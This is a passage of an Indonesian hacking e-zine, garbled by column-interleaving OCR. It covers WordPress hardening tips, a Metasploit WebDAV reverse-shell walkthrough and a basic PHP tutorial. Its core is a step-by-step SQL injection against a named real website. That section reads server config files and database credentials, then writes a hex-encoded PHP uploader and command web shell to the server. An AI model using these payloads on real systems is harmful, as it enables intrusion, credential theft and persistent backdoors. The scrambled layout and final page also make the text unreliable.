“Independence C0DES, DC Backs to Holy”

yang memunculkan error di file tersebut Jangan lupa ganti wp-login.php menjadi
dan juga masih banyak yang lain nya anda gorengan-tempe.php . Jika anda
bisa mencar sendiri tentunya, tambahkan menginginkan instan nya anda bias
langsung download plugin Stealth Login.
kode di bawah <?php .

Contoh :
6. Plugins Security
<?php
ini_set(“display_errors”, 0);
Untuk melindungi web WP anda dari hal
error_reporting(0);
yang kurang berkenan xixixi, anda bisa
/**
menambahkan beberapa Plugin Security
yang di antaranya di bawah ini tapi saya
tidak menjelaskan deskripsinya karena
5. Privat Login
anda bisa langsung mengunjungi web yang
menyediakan Plugins tersebut.
Halaman untuk login pada WP secara
default adalah “wp-login.php” atau bisa
 WordPress Database Backup
melalui “wp-admin” yang nantinya juga
(http://www.ilfilosofo.com/blog/wp-
akan dialihkan ke wp-login.php.Untuk db-backup/)
mengganti default login anda bias  Semisecure Login
mengganti missal halam login diganti (http://jamesmallen.net)
dengan gorengan-tempe.php,edit file wp-  AskApache Password Protect
login.php terus cari semua kata “wp- (http://www.askapache.com)
login.php” (terdapat 19 kata wp-  Force SSL
login.php) ganti kata wp-login.php (http://almosteffortless.com/)
dengan gorengan-tempe.php.  WP Security Scan
(http://wordpress.org/extend/plugin
Bukan cuma file wp-login.php saja yang s)
kita harus edit karena kalau hanya file  Secure Files
wp-login.php maka ketika anda logout di (http://wordpress.org/extend/plugin
web WP anda akan memunculkan 404 Not s)
Found, nah bagaimana biar bias loguot  WP-SpamFree
(http://www.hybrid6.com/)
dengan tenang alias tidak 404 Not Found.
 BackUpWordPress
Masuk ke direktori wp-admin dan edit (http://wordpress.designpraxis.at)
file admin-header.php, kemudian lihat  Anonymous WordPress Plugin Updates
(http://f00f.de/)
line 126.
 Replace WP-Version
(http://wordpress.org/extend/plugin
$links[15] = '| <a href="' .
s/)
wp_logout_url() . '" title="' . __('Log
Out') . '">' . __('Log Out') . '</a>';

Edit ‘ . wp_logout_url() . ‘ ganti


7. Mengganti Akun Admin
dengan alamat url dari link logout di
Dashboard WordPress, contoh dari link
Masuk ke akun cPanel dan pilih tool
logout:
PHPMyAdmin pada kategori
Databases,Setelah itu pilih file
http://mendoan.tr/wp-
database wordpress yang ingin anda ganti
login.php?action=logout&_wpnonce=89526ec usernamenya di bagian kiri panel pilih
g4 wp_user, Pilih username yang ingin
diubah atau centang kotak di sebelah
Ganti sehingga menjadi: kiri username yang akan diganti, Ganti
username sesuai dengan yang anda
$links[15] = '| <a inginkan.
href="http://mendoan.tr/wp-
login.php?action=logout&_wpnonce=89526ec
g4" title="' . __('Log Out') . '">' .
__('Log Out') . '</a>';

Devilc0de INDONESIA “To Unite and Develop” 41


“Independence C0DES, DC Backs to Holy”

8. Backup dan Restore database Devilz Reflection


Wordpress

Ini yang penting, selalu bacup dan


Apa KATA Mereka Soal
restor database anda untuk mencegah hal-
hal yang tidak di inginkan jika suatu
waktu terkena salah klik delete dari
HACKING n DEFACEMENT:
hacker (soal nya pernah dengar kejadian
seperti itu) Kawan-kawan pasti sudah akrab sekali dengan
istilah hacking dan defacement. Kenapa belakangan
defacement jadi semacam trend dikalangan hacker
9. Memilih tempat Hosting muda?

Dan ini juga tentunya penting bagi kita Jawabannya ada dikepala kalian masing-masing.
untuk memilih tempat hosting yang kita
inginkan jadi kita tahu hosting yang Berikut kami mengutip dari diskusi dalam salahsatu
kita gunakan aman terhadap serangan thread DC yang dapat dijadikan bahan renungan
hacker, walaupun tidak semua hosting
aman tapi lebih baik kita memilih tempat bersama.
hosting yang memang benar-benar kita
rasa aman untuk security nya. numlock: patch tanpa deface.

cancer: buat bot IRC


10. Penutup
andre_corleone: bot IRC + carding
Ingat ya tulisan di atas hanya dasar
dari keamanan WP karena masih banyak
keamanan dari WP yang lain tapi lebih cruzen: kgk demen hacking, lebih seneng ke
baik mencegah dari pada mengobati
walaupun benar tidak ada system yang
100% aman pepatah mengatakan sedia programming.
payung sebelum hujan.
mywisdom: DDOS, worm, programing

Email : jimmy deadcode: coding buat hacking tool

tempemendoan@hotmail.co.id cybermuttaqin: lebih ke arah security

ketek90: lebih ke arah coding buat hacking tool


Thanks to :
wenkhairu: method hacking, security,
 Kang r3m1ck atas ilmu tentang
wordpress nya
programing
 Mas kaMz lan mas Farhatz suwun yo
mas :D
 Kang chaer yang selalu memberi whitehat: programming computer
semangat
 AdeYonatan yang menemani buka redaksi: sejak awal sejarahnya, hacking adalah
puasa dengan tempe mendoan =))
 Mas v3n0m yang menemani twitteran soal improvisasi system bukan defacement!!!
 my Love Dyla semoga cepat sembuh
ya :*

Devilc0de INDONESIA “To Unite and Develop” 42


“Independence C0DES, DC Backs to Holy”

Tema : WebHacking IP Attacker : 10.97.97.185 (Linux


Author : X_wungu Ubuntu)

IP Target : 192.168.66.43 (MS Windows


Eksploitasi WebDAV Server 2003 dengan webserver IIS 6.0 dan
modul DAV enabled).
vulnerability
Tools yang saya gunakan untuk percobaan
ini adalah Metasploit Framework.
Contoh Target :
http://www.reme.mil.my/robots.txt Pertama, saya scan target untuk
meyakinkan kalau WebDAV nya enabled.
web ini terdapat Kelemahan pada Komponen
WebDAV, Microsoft IIS Server 5.0 tcp Melalui Metasploit Framework boleh..
port 80 yang sudah di jelaskan di pake tools scanning webDAV lainnya juga
http://www.microsoft.com/technet/securit boleh…
y/bulletin/ms03-007.mspx

WebDAV (Web Distributed Authoring and


Versioning)adalah fitur webserver yang
memungkinkan pengguna saling
berkolaborasi memanage konten sebuah
website.

Terkadang demi alasan kenyamanan dan


praktis (ga mau ribet) bagi pengguna
fitur DAV, konfigurasi yang diberikan
oleh sysadmin terlalu radikal sehingga
permission yang di set terlalu
berlebihan (misalnya selain bisa read
juga write dan bahkan execute, dsb).

Kali ini akan saya perlihatkan contoh Oke, terlihat jelas di gambar kalau
eksploitasi webDAV akibat konfigurasi webDAV enabled. Sekarang mari kita ke
permission yang terlalu ‘bebas’ di sisi target melihat konfigurasinya.
direktori bernama ‘webdav’ pada Konfigurasinya adalah sebagai berikut.
webserver.

Akibat terburuk adalah keseluruhan


webserver bisa dikuasai.

Ini teknik lama,karena DAV juga fitur


lama. Tetapi bagi penetration tester
tidak apa-apa mau pintu lama atau
jendela lama. Yang penting bagaimana
caranya masuk ke sistem hahah.

Apalagi, ternyata masih banyak webserver


di jagat internet yang menggunakan
webdav.

Untuk percobaan labnya saya coba dengan


setting seperti berikut:

Devilc0de INDONESIA “To Unite and Develop” 43


“Independence C0DES, DC Backs to Holy”

Yak.. folder C:\Inetpub\wwwroot\webdav Dari gambar di atas, pastikan properti


benar-benar target empuk :P exploit sudah terisi. Dengan mengetikkan
perintah
(Tapi ceritanya saya gak tau konfigurasi
di sisi server ini heheh). Kemudian show options set PATH-nya menjadi PATH
jalankan lagi Metasploit Frameworknya… tempat akan diuploadnya file ASP dalam
hal ini di /webdav/open_sasame.asp

Dan target RHOST (Remote HOST).Sehingga


menjadi seperti gambar ini :

Setelah saya mengetahui webDAV enabled,


(asumsi saya belum tau folder webdav di
server ternyata writeable) trial and
error saja saya gunakan exploit uploader
file reverse shell ASP.
Jika semua properties sudah di set
Dengan reverse shell, jika berhasil di
dengan benar, langkah selanjutnya adalah
upload, saya bisa mendapatkan shell
eksekusi… Saya mengetikkan perintah
webserver melalui file .ASP. Kalau belum
exploit -j sehingga proses exploitasi
jelas tentang reverse shell,bisa cari
menjadi background process.
manualnyaç

Exploit yang akan saya gunakan bernama


iis_webdav_upload_asp. Dari namanya
sudah jelas kalau tujuannya untuk
mengeksploitasi webdav dengan mengupload
file ASP ke direktori yang writeable.

Devilc0de INDONESIA “To Unite and Develop” 44


“Independence C0DES, DC Backs to Holy”

Dari pesan ketika proses exploit environment webserver. Horray! I’m at


berjalan terlihat jelas langkah-langkah webserver!
exploitnya.

Pertama adalah meng-upload file text


bernama open_sasame.txt ke folder webdav
di server target. Kemudian berusaha
merubah file txt menjadi file ASP dan
mengeksekusinya.

Terlihat juga proses delete backdoor


gagal sehingga kalau sysadmin jeli, bisa
terlihat file reverse shell ASP itu di
direktori webdav nya.

Ini screenshot desktop server korban


hehe....

Selanjutnya, kembali ke console


Metasploit, saya memanfaatkan exploit
lain yang akan menghandler reverse shell
yang dikirim dari target. Saya coba
kirimkan HTTP request untuk file
open_sasame.asp (maksud konkritnya sih
browsing biasa aja ke target
http://192.168.66.43/webdav/open_sasame. Pada contoh dibawah ini, saya coba kill
asp ) dan respon dari server adalah program notepad.exe pada webserver
sebuah shell… heheheh.

Binggo, sampailah pada sesi meterpreter.


Sekarang sebenarnya saya sudah ada di

Devilc0de INDONESIA “To Unite and Develop” 45


“Independence C0DES, DC Backs to Holy”

Tema : WebHacking seperti ini perintahnya.


Author : Unyil select file_priv from mysql.user

Step-by-Step Contoh :

SQL-injection metode into union all select 1,file_priv,3 from


outfile mysql.user--

First thanks for dc for recommending 2. Load_file


this POC.

Saya coba re-wrtie Proof Of Concept ini Jika kita telah punya privilege maka
karena, sebelumnya hanya terfokus pada load_file sangat berguna sekali dalam
target alias straight to the Real melakukan penetrasi website. Kita bisa
website. Jadi sekarang saya buat artikel me-load isi sebuah file ke halaman web.
ini menjadi 2 bagian. Perintahnya seperti ini :
Pertama Bersifat teoritical dan kedua select load_file (‘/path/namafile’)
practice ke target web. Contoh :
union all select
Sebenarnya dalam artikel ini ada 2 inti 1,load_file(‘/var/www/site/config.php’),
masalah yang akan dibahas yakni 3--
load_file dan into outfile.

Dua perintah sql yang digunakan untuk


menampilkan data dari computer target ke Atau bisa juga dengan mengkoversinya
Halaman web yang vulnerable. Kemudian menjadi hexa untuk bypass magic quote
melakukan write data dengan into outfile ataupun stripslashes.
ke Directory target sebagai cara untuk
memperoleh akses lebih luas ke target Union all select
system. 1,load_file(0x2f7661722f7777772f73697465
2f636f6e6669672e706870),3—
Ok, here we are....

Disini saya asumsikan teman-teman sudah


mengerti basic sql injection. 3. Finding Web Directory

Just walk around di devilzc0de forum


Banyak yang bahas Basicnya. Menemukan web directory sangat
diperlukan jika ingin melakukan write ke
directory. Halaman yang menampilkan
error biasanya menampilkan directory web
[=====Some basic theories=== ] tapi Kadang sebuah web tidak menampilkan
error di halaman. Jadi kita harus
melakukan load_file penting untuk
mengetahui directory web. File penting
1. File_privilege
yang bisa di load dalam menemukan web
directory adalah apache configuration
Untuk melakukan Load dan write yang dan v-host.
terpenting adalah hak dari user apakah
File-file ini berisi configurasi path
biasa melakukan load atau write.
sebuah web dan daftar host yang
checking file_priv sangat diperlukan,
ada.berikut beberapa lokasi file
karena bisa dengan akses ini kita tidak
configurasi apache yang umum:
harus cracking passwd admin dan nyari
/etc/init.d/apache
admin page. Ada banyak cara untuk check
/etc/init.d/apache2
privilege tapi yang paling simple

Devilc0de INDONESIA “To Unite and Develop” 46


“Independence C0DES, DC Backs to Holy”

/etc/httpd/httpd.conf http://www.londonsalsa.co.uk/clubNight_d
/etc/apache/apache.conf ips1.php?clubNightID=187
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
Oh ya…disini saya anggap anda sudah
/usr/local/apache2/conf/httpd.conf
familiar dengan basic sql injection.
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf Tools yang di perlukan:
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.incl
ude - Hackbar firefox addon (untuk
mempermudah sqli)

Silahkan di unduh di sini:


Untuk lebih detil mengenai file-file
penting ini just check here https://addons.mozilla.org/en-
http://wiki.apache.org/httpd/DistrosDefa US/firefox/addon/hackbar/
ultLayout

1. Cari panjang Column dengan perintah


4. write dengan Into outfile order by

Setelah web directory ditangan langsung lakukan order by sampai muncul error
saja coba write file ke directory yang Unknown column in 'order clause'
writable. Jika directory tidak writable
saya coba order by 32 baru muncul error,
coba cari directory image atau upload
berarti count column ada 31.
directory biasanya kedua directory ini
writable. perintahnya seperti ini. http://www.londonsalsa.co.uk/clubNight_d
ips1.php?clubNightID=187/**/order/**/by/
Select ‘isi code’ into outfile
**/31--
‘/path/namafile’
Contoh :
Union all select 1, UNION SELECT
1,0x3c3f696e636c75646528245f4745545b2263 2. UNION ALL SELECT
6d64225d293b3f3e,3 INTO OUTFILE
'/var/www/public_html/shell.php'—-
Cari Column yang bisa retrieve data
dengan perintah union all select
*KETERANGAN :
code hexa diatas adalah hasil conversi http://www.londonsalsa.co.uk/clubNight_d
<?include($_GET["cmd"]);?> ips1.php?clubNightID=187/**/UNION ALL
SELECT
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1
7,18,19,20,21,22,23,24,25,26,27,28,29,30
And yeah done, mari kita implementasi ke ,31--
salah satu target yang vulnerable…
di halaman muncul angka 8, 9, 22 berarti
kita bisa lakukan dump data pada salah
[====Some real POC=====]
satu kolom tersebut.

untuk target saya gunakan web yang di


share member Devilzc0de

Devilc0de INDONESIA “To Unite and Develop” 47


“Independence C0DES, DC Backs to Holy”

Di page muncul Y berarti punya akses


load and write …

5. Finding Path Directory and Writable


one
Dalam kasus ini Mudah sekali menemukan
path directory, karena page mengeluarkan
error

Warning: mysql_num_rows(): supplied


argument is not a valid MySQL result
resource in
/home2/salsamov/public_html/londonsalsa/
functionFiles\
/ClubNightRating.php on line 69
3.Check version, user(), database()

http://www.londonsalsa.co.uk/clubNight_d jelas pathnya berada di /home2


ips1.php?clubNightID=187 UNION ALL
SELECT 6. Test write
1,2,3,4,5,6,7,group_concat(version(),0x3 Kita lakukan test write code ke writable
a,user(),0x3a,database()),9,10,11,12,13, directory, kita test write ke directory
14,15,16,17,18,19,20,21,22,23,24,25,26,2 tmp
7,28,29,30,31--

Di page muncul : 5.0.51a-24+lenny5-


log:root@localhost:salsamov_londonsalsa
berarti mysql versi 5, user
root@localhost nama db
salsamov_londosalsa.

4.Check file_priv
jadinya seperti ini :

http://www.londonsalsa.co.uk/clubNight_d
ips1.php?clubNightID=187%20UNION%20ALL%2
0SELECT%201,2,3,4,5,6,7,file_priv,9,10,1
1,12,13,14,15,16,17,18,19,20,21,22,23,24
,25,26,27,28,29,30,31%20from%20mysql.use
r--

http://www.londonsalsa.co.uk/clubNight_d
ips1.php?clubNightID=187%20UNION%20ALL%2
0SELECT%201,2,3,4,5,6,7,%27check%20sound
%27,9,10,11,12,13,14,15,16,17,18,19,20,2
1,22,23,24,25,26,27,28,29,30,31%20into%2
0outfile%20%27/home2/salsamov/public_htm
l/londonsalsa/tmp/cek.php%27--

ternyata web ini magic quote nya on atau


juga melakukan filtering dengan
stripslashes

Devilc0de INDONESIA “To Unite and Develop” 48


“Independence C0DES, DC Backs to Holy”

*Keterangan :

stripslashed salah satu cara meng-handle


sql injection, yakni memfilter setiap
input single atau double quote dengan
memberikan \

Jadi kasusnya sekarang kita tidak bisa


langsung write dari address bar.

Next,masih bisa di akali kok . . .

7. load File penting


file db ini terletak di ..
kita akan coba load_file penting koneksi /home2/salsamov/public_html/londonsalsa/
ke database, biasanya file ini terpisah functionFiles/dbConnectLOCAL-IGNUM.php
dengan nama koneksi.php,connect.php or
whatever namanya.
Tips…File koneksi akan dibutuhkan di
file yang menampilkan berita, karena konversi lagi ke hexa, next kita load
harus retrieve data berita dari file db tersebut
database, jadi sekarang kita coba load
http://www.londonsalsa.co.uk/clubNight_d
file berita untuk menemukan lokasi file
ips1.php?clubNightID=187/**/UNION/**/ALL
koneksi, biasanya kode phpnya <?php
/**/SELECT/**/1,2,3,4,5,6,7,load_file(0x
include "namafilekoneksi" ?> load file
2f686f6d65322f73616c73616d6f762f7075626c
ini
69635f68746d6c2f6c6f6e646f6e73616c73612f
/home2/salsamov/public_html/londonsalsa/ 66756e6374696f6e46696c65732f6462436f6e6e
newsListings.php 6563744c4f43414c2d49474e554d2e706870),9,
10,11,12,13,14,15,16,17,18,19,20,21,22,2
3,24,25,26,27,28,29,30,31--

blok pathname diatas di hackbar pilih


encoding -> hex encoding -> conversi ->
string to 00ff00ff lihat kembali source page dan muncul ini
jadinya seperti ini : nemu tuh,user+passwd nya database

http://www.londonsalsa.co.uk/clubNight_d
ips1.php?clubNightID=187/**/UNION/**/ALL
/**/SELECT/**/1,2,3,4,5,6,7,load_file(0x
2f686f6d65322f73616c73616d6f762f7075626c
69635f68746d6c2f6c6f6e646f6e73616c73612f
6e6577734c697374696e67732e706870),9,10,1
1,12,13,14,15,16,17,18,19,20,21,22,23,24
,25,26,27,28,29,30,31--

klik ctrl-u untuk melihat source


halaman, and terlihat ada include file
db . . .

Devilc0de INDONESIA “To Unite and Develop” 49


“Independence C0DES, DC Backs to Holy”

8. upload backdoor dari phpmyadmin

Sekarang kita udah dapet username and


passwordnya db, langsung saja login di
phpmyadmin.

Masuk ke salah satu database, disini


saya masuk ke database test kemudian
klik tab sql, masukan code berikut

create table up (test text); insert into


up values
perintah diatas yakni untuk membuat
(0x3c7072653e3c626f6479206267636f6c6f723 table dengan nama up, kemudian inserting
d73696c7665723e3c3f7068702069662840636f7 value php uploader yang sudah di
07928245f46494c45535b2766696c65275d5b277 konversi ke hexa supaya tidak error di
46d705f6e616d65275d2c245f46494c45535b276 phpadminya. setelah itu write code php
6696c65275d5b276e616d65275d2929206563686 uploader dari table up tersebut ke
f2022677265617420756e79696c22203f3e3c666 directory
f726d206d6574686f643 '/home2/salsamov/public_html/londonsalsa
d27706f73742720656e63747970653d276d756c7 /tmp/cek.php'.
469706172742f666f726d2d64617461273e3c696
terakhir drop table.
e70757420747970653d2766696c6527206e616d6
yang butuh code php uploadernya ini :
53d2766696c65272073697a653d273430273e3c6
96e70757420747970653d277375626d697427207
6616c75653d27676f20686f6e6579273e3c2f666
f726d3e3c70202f3e3c6 <pre><body bgcolor=silver><?php
66f726d206d6574686f643d27706f7374273e636 if(@copy($_FILES['file']['tmp_name'],$_F
f6d6d616e64203a203c696e70757420747970653 ILES['file']['name'])) echo "great
d277465787427206e616d653d27636d642720736 unyil" ?><form method='post'
97a653d27353027203e3c2f666f726d3e203c3f2 enctype='multipart/form-data'><input
04073797374656d28245f524551554553545b276 type='file' name='file' size='40'><input
36d64275d293f3e3c2f7072653e); type='submit' value='go honey'></form><p
/><form method='post'>command : <input
type='text' name='cmd' size='50'
select * from up into outfile ></form> <?
'/home2/salsamov/public_html/londonsalsa @system($_REQUEST['cmd'])?></pre>
/tmp/cek.php';
drop table up;

Devilc0de INDONESIA “To Unite and Develop” 50


“Independence C0DES, DC Backs to Holy”

9. Upload shell

kita coba akses php uploadernya


http://www.londonsalsa.co.uk/tmp/c
ek.php
DEvilz Words
Belajar adalah suatu proses,
seseorang tidak memulai sesuatu
dengan menjadi Gunung, tapi berangkat
dari tumpukan2 tanah yang menggunduk,
kemudian besar, besar dan besar. Jadi
bukan masalah kalau semua berawal
dari dasar, toh semakin banyak
pelajaran dan pengalaman, kemampuan
seseorang akan bertambah.

Kelak mereka script kiddies akan


menjadi para developer, sang creator
peralatan perang sampai kemudian jadi
apa yang disebut ‘elite’ mereka yang
mampu memberikan solusi untuk
persoalan computer security, jejaring
(network). Mereka yang nantinya mampu
mengevolusi kemampuan komputer dan
internet, memudahkan umat manusia di
masa yang akan datang.

Tapi tanamkan juga apa yang disebut


‘tekad untuk menjadi elite’ seperti
dalam tulisan om Y3dips ‘Aku Tidak
İngin Menjadi Script Kiddies’.

Ingatlah Ilmu Padi, semakin berisi


semakin tunduk, namun teruslah
menengadah melihat dunia di luar sana
agar kalian tahu kenapa Hacking
Computer dapat mengubah dunia.

Aku sangat suka semangat kawan2 muda,


Kalian akan selalu menginspirasi dan
memotivasiku untuk terus belajar dan
berkarya.

Mari kawan2 Muda ku sayang, kita


Beres . . .tinggal upload shell yang berkontribusi melalu Hacking Computer
lebih advanced. demi merubah dunia.

Niatkanlah belajar kalian untuk


memberi kehidupan baru bagi manusia-
*Tanggapan Redaksi: manusia yang akan datang, para
penerus kalian yang akan menyebut
kalian sebagai ‘Hacker Pahlawan’
Keren,punya karakter sendiri dalam
webhack yang nggak terpaku dengan 1 When I see your codes there is not
teknik umum. athing that I would change, coz your
AMAZING just the way you are!!!!!!

(Nofia Fitri)

Devilc0de INDONESIA “To Unite and Develop” 51


“Independence C0DES, DC Backs to Holy”

Author: Kidofdream 4. Support banyak web server seperti


Apache, IIS, dan lainnya
Pengenalan dan syntax 5. Mampu berjalan di berbagai Sistem
dasar PHP [basic] Operasi (Linux, Windows, Unix, dan
lainnya)
6. Masih banyak kelebihan lainnya
Baiklah kawan2 devilzc0de semua, yang bisa anda cari:
berhubung saya anak baru dan newbie http://id.wikipedia.org/wiki/php
disini, saya mencoba sedikit sharing.
.. :P (padahal ga tau lagi)
Setelah saya liat dan search di sub
forum php, semuanya kayanya sharing yg Untuk belajar PHP kita perlu
bwt expert only, bwt newbie kaya saya mempersiapkan beberapa hal terlebih
yang sama sekali belum mengenal php dahulu. Persiapan-persiapan yang
tidak ada (kalo salah maaf ya ). dibutuhkan untuk belajar PHP adalah:

Oke, cukup intronya..(dari tadi prasaan 1. Tentunya mental dulu donk (oke ini
gak cukup2 deh) lebay)
Oke,, kali ini beneran cukup ..(kapan 2. Sebuah PC punya sendiri (saya tau,
cukupnya ?!??) saya tau, ini gak perlu dibahas, tapi
ini penting)
Langsung aja ya …
3. *okeoke saya serius sekarang, yang
pertama adalah Web Server, seperti
Baiklah pada postingan kali ini saya Apache atau IIS: Internet
akan menyampaikan sedikit tentang PHP.
Information Service, Anda bisa
PHP: Hypertext Preprocessor adalah suatu
mendownload Apache
bahasa pemrograman web yang biasanya
di http://www.apache.com.
disisipkan dalam html yang berguna untuk
membuat website yang dinamis (menurut Memang apa sih gunanaya web server?
saya). Kalo mau lebih lengkapnya
silahkan anda ke: Anda gak perlu tau itu, itu ga penting,
kalo anda mau tau googling saja
http://php.net, (sebenarnya saya gak tau :P)
di http://id.wikipedia.org/wiki/php,
4. *Yang dibutuhkan selanjutnya adalah
atau lebih komplit modul PHP yang bisa anda download
ke http://www.google.co.id aja deh :P . di http://php.net.

Memang gunanya buat apa sih?


Selain PHP ada juga yang lain seperti
ASP (active server page) dan banyak lagi Jangan meremehkan saya ya, saya tau kalo
lainnya, namun PHP punya kelebihan- yang ini, ini tuh berguna untuk mm.. apa
kelebihan tersendiri. Kelebihan php ya? mmm... googling aja deh,, masa sih
diantaranya adalah : yang beginian juga saya harus kasi tau ?
hehe,, becanda-becanda, modul php itu
1. Pastinya free berfungsi untuk menjalankan PHP lah,,
2. Open source yang lainnya tanya google ajah.. :P
3. Support banyak database, serperti
MySQL, Oracle, PostgreSQL, dan 5. *MySQL, bisa anda download secara
lainnya gratis di http://mysql.net.

Devilc0de INDONESIA “To Unite and Develop” 52


“Independence C0DES, DC Backs to Holy”

6. Editor PHP, anda bisa menggunakan tidak terlalu jauh berbeda dengan
software seperti dreamweaver, php penulisan dalam bahasa pemrograman C,
designer atau php editor ataupun jadi buat anda yang pernah belajar
notepad. Googling aja ya, mudah kok bahasa C atau C++ saya rasa anda tidak
dapatnya, kalo emank males pake notepad lagi sulit dalam penulisannya. Perbedaan
aja (why not?). bahasa PHP dengan bahasa pemrograman
lainnya, dalam bahasa pemrograman php
7. Sebuah web browser seperti Internet tidak perlu adanya pendeklarasian
Explorer, Firefox, Thunderbird, Google variable.
Chrome, dan lainnya.

STRUKTUR PENULISAN PHP

NB: *untuk nomor 3, 4 dan 5 saya 1. Dalam memulai php (baik yg disisipkan
sarankan anda lebih baik mendownload dalam html atau tidak), selalu diawali
software yang sudah mencakup semua itu,
dengan syntax
biar ga ribet, contohnya seperti XAMPP,
Appserv, PHPTriad dan lainnya, karena PHP Code:
didalamnya sudah mencakup (Apache,
MySQL, PHP, PhpMyAdmin), anda bisa <?php
mendownload XAMPP di

http://apachefriends.org/en/xampp-
windows.html atau bisa juga

atau appserv di PHP Code:

http://appservnetwork.com <?

Untuk selanjutnya sekarang kita masuk ke Dan pada akhirnya ditutup dengan syntax:
syntax-syntax dasar dalam pemrograman
PHP. PHP Code:

Nah, seperti saat belajar bahasa ?>


pemrograman lainnya, untuk mempelajari
syntax dasar kita biasanya membuat
2. Setiap baris kode php diakhiri dengan
program hello world.
tanda semicolon atau titik koma (;),
satu baris disini maksudnya adalah satu
Oh ya, sebelumnya saya ingin terlebih
baris dalam suatu perintah, bukan dalam
dahulu menyampaikan aturan2 dan struktur
suatu penulisan.
penulisan dalam php. cekidot..
Baiklah, sekarang mari kita mulai
syntax-syntax PHP biasanya disisipkan
membuat program yang akan menampilkan
dalam bahasa html, walaupun sebenarnya
"Hello World".
sintaks-sintaks PHP bisa berdiri
sendiri, tapi dalam membangun sebuah
Ketiklah kode di bawah ini kedalam
web, PHP harus lah "bergabung" dengan
editor php anda.
HTML, maka dari itu disini saya
menyarankan agar lebih dahulu menguasai PHP Code:
HTML sebelum belajar PHP (cuma saran,
loh). <?php
echo "Hello World";
Sintaks-sintaks dan aturan dalam PHP, ?>

Devilc0de INDONESIA “To Unite and Develop” 53


“Independence C0DES, DC Backs to Holy”

Lalu simpanlah dengan nama 2. Yang kedua mengunakan tanda /* dan


helloworld.php pada htdocs (jika anda diakhiri tanda */ , tag ini digunakan
untuk membuat komentar dalam jumlah yang
menggunakan xampp, letak htdocs biasanya banyak(dari pada makin bingung dengan
di C:\xampp\htdocs). Lalu untuk penjelasan saya , mending kita coba
menjalankannya bukalah web broswer aja )
(firefox, IE, etc) anda lalu ketikkan
lah http://localhost/helloworld.php pada ketikkan script berikut
address bar nya. Setelah anda tekan
PHP Code:
enter, lihatlah yang terjadi :santai
<?php
Nah, seperti yang saya sampaikan, php /* program komentar
biasanya digabung dalam dokumen html, by : teuku alfian pase
nah dibawah ini adalah contoh yg date : 29 juni 2011 , time : 1:10 AM
disisipkan dalam dokumen html . */

PHP Code:
echo " mari membuat komentar";
<html>
<head> // ini juga komentar satu baris
</head> // bisa juga buat satu baris lagi
<body> ?>
<?php lalu jalankan seperti biasa .. 
echo "Hello World";
?> NB: komentar tidak akan dieksekusi, jadi
</body> tidak akan terlihat saat anda
</html> menjalankannya.

Simpanlah dengan nama helloworldhtml.php Oke, saya rasa kali ini cukup dulu basic
di htdocs. tutorial dari saya, untuk tahap
selanjutnya nanti saya lanjutin di forum
NB: (walaupun file php gabung html .. 
ekstensi nya tetap .php atau .php3)

Jalankan dengan mengetikkan


http://localhost/helloworldhtml.php pada
address bar web browser anda. lalu Special Thanks to:
lihatlah yang terjadi ..
Allah SWT, My prophet, My parents, My
Baiklah selanjutnya kita akan membuat teacher, My Friends, Sukma Bangsa SHS
komentar, apa itu komentar? Buat yang Google, All Underground forum
sudah pernah belajar programming, saya Indonesia(Devilzc0de , Jasakom, xcode,
rasa tidak asing lagi dengan komentar. etc ), Lhoetech, etc .
Nah, ini buat yang belom tau aja ya,
Greetz: Nofia Fitri (thanks kakak dah di
komentar itu adalah suatu keterangan
rekom masuk ezine, ga nyangka loh),
dalam bahasa pemrograman, komentar itu
Y4pc0, grognop, zhu.Locianpwe, Rakan
tidak akan di eksekusi, komentar dibuat
sinaroe, kompi ku (biarin jadul), s’to,
biasanya digunakan untuk dokumentasi
Wahyu_devilcode, chaer.newbie,wenkhairu,
sebuah program. Ada dua cara untuk xtr0nic, dan semua yg ga bisa saya
membuat komentar: sebutkan satu persatu.

Kritik dan saran tolong kirim ke:


1. Yang pertama menggunakan tanda double
slash ( // ), tag // ini digunakan untuk apin.teuku@gmail.com atau blog saya
membuat komentar satu baris. http://kidofdream.blogspot.com

Devilc0de INDONESIA “To Unite and Develop” 54


n

55
a
l e
uIn
b I g r
a k
a h
s u
t
iie d n
ds & u
iers .

Devilc0de INDONESIA “To Unite and Develop”


n vg e. x a
i n o
b r
a
aotyah t t
np e
h a n
e s n h
c e
m
rg
a a,
i e
klo lde t S
a p
u ,bk c
i
0 i
r
.
t
gori lz c u
g a g s b
n
u bfb
r avi
n
e
s
w ede e
d a r
x b 0n a k e
t l
c i h m
:
h tz
il
km
g e
a
b t / t
h
e k iunt m p m .
l iv r a i o 2
O d eM e n r c
. v
e
sD. b e c _

<li><a href='http://devilzc0detemplate.blogspot.com'><img
m s t e
) o
ne2 t e t

edit html > Expand Template Widget > dan cari code ini
t k n p a
i a a u a s l
/*------------18-8-2011---------------------------------------------------------*/

gl el t k g p
n pk mp n k o
l m
im ge U u b e
aTen T . s . T
_
y a a a
m . . e e
asy n y r i t d )
s u a n u e r a 0 i
Devilzc0de Blog Special Template

r l n
3na a
o u
k e
t
l
a
g
g
i
d p
m
c
z i
#b l s
a a l o n e l n
ene r : l
p t l
b e
s t j
l i
v a
n akm e t m a e
d 1 e k
i
ik
z h u e b t a 0 9 D s
E ha
a n k
i ) t o
s i
d d
n c b
o /
L a
bd gi r g e e a z
l p C s
i
am u e g l r i t l l
ye n b i i e n u i b

/*-------------------------------- My Imajinasion
“Independence C0DES, DC Backs to Holy”

n s i i d f g o . n v
e 0 _ a a
ar a i g c . e d f U e
r y
n
d
a es ng a , i o i a m / m Q e n
plea g r d l v y / 3 P m a
&ae y a
b e
t n b a
f n
u n
a : l
l /
e k m
ys u e t a i n g p
t ? l h k a
Ia s i k d i e n t / i a
l u
s e
T
RSm t a w k s m e m f

=========================
ua a t a l d h o / e a
Ti.el y , t m d t c m t m r
U n k e t a i i : : . o g s e
d
Hgb o
a g n
a o
o l h o
l d
e a
u e
r c
. n a 0
irbjabl h b i t p g s i d a t
a c
z
t a e d e u n e f e y
( l
abea t b c ) g e s a r r i
g a m an
f d d i m i a a e v
nam
i au a
t (co a
d i
w d k k
n d d
e h
s i a e
rnytamb i u a u i o m 4 f
o h
C d
e r s. s d s t l a . . : N l
pkr m
m i e e u
t i(
h d i n l w w o g l
e a p i xt c. a
y
a b u i
t
n
w w
w
w
w T k
a n
a A
